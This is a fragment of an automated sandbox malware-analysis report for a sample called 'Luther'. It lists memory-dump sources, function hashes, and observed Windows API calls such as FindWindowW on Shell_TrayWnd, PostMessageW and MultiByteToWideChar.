                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: 4fc036c0a9afac20e6c80e6599e6e824f08809541f55c11ff714c3729558f3c3
                                                                                                          • Instruction ID: f5b182c9927ccd1da3bfcbe571429d06cf12a5e001a40eeb24ac625afbf814b5
                                                                                                          • Opcode Fuzzy Hash: 4fc036c0a9afac20e6c80e6599e6e824f08809541f55c11ff714c3729558f3c3
                                                                                                          • Instruction Fuzzy Hash: FAD0A931389300AAE668B331AC0BFD26A549B00B00F100835B345FA0D0C8A26801C644
                                                                                                          APIs
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC2DC8
                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EC2DDB
                                                                                                            • Part of subcall function 00E9F292: Sleep.KERNEL32 ref: 00E9F30A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: e5bb9e29e0e693666c5c8bad29d7e149b887203f88e68eaec892ee24fbca4ca8
                                                                                                          • Instruction ID: a10a8b0c17bf66eded9803220b305f0b86da7409bf730bf0421aec0ecf2c69fc
                                                                                                          • Opcode Fuzzy Hash: e5bb9e29e0e693666c5c8bad29d7e149b887203f88e68eaec892ee24fbca4ca8
                                                                                                          • Instruction Fuzzy Hash: 10D02235398300BBE668B331AC0FFE27B549F00B00F100835B349FA0D0C8F26801C640
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E6C213
                                                                                                          • GetLastError.KERNEL32 ref: 00E6C221
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E6C27C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1717984340-0
                                                                                                          • Opcode ID: 5e5c6102924e1a32fda308955baa60e8771c9d792e2c1a43fddafaa3867e7243
                                                                                                          • Instruction ID: 0df02e9556dd2ada780078829439556c5676dd9926b8ed76f1262f91e8cba0fa
                                                                                                          • Opcode Fuzzy Hash: 5e5c6102924e1a32fda308955baa60e8771c9d792e2c1a43fddafaa3867e7243
                                                                                                          • Instruction Fuzzy Hash: CC410530680A05AFCB218FE5E854ABA7BE5EF11798F346169FC95B71B1DB319C01CB60